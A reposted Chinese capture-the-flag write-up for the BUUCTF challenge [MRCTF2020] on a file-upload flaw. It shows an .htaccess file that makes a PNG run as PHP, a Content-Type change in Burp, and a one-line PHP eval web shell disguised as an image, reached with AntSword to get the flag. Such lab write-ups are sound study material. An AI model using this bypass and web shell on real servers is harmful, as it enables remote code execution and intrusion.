BUU-WEB-[MRCTF2020]你传你呢

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[MRCTF2020]你传你呢相关的知识,希望对你有一定的参考价值。

[MRCTF2020]你传你🐎呢

在这里插入图片描述
文件上传漏洞。
通过测试只能上传图片格式,于是通过.htaccess配置文件进行修改,将图片格式自动转换成php文件。
具体.htaccess作用可以百度百科一下。

.htaccess配置文件:

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

上传时使用burp修改文件格式,改成image/jpeg即可上传成功。
在这里插入图片描述
在这里插入图片描述

上传图片木马:

<?php
@eval($_POST['shell'])
?>

(不需要做任何修改,直接上传图片木马即可)
使用蚁剑连接。
在这里插入图片描述
flag在根目录下面。
在这里插入图片描述

以上是关于BUU-WEB-[MRCTF2020]你传你呢的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF [MRCTF2020]你传你呢

BUUCTF [MRCTF2020]你传你呢

BUUCTF[MRCTF2020]你传你ma呢

MRCTF2020

BUU-WEB-[MRCTF2020]Ez_bypass

BUU-WEB-[MRCTF2020]套娃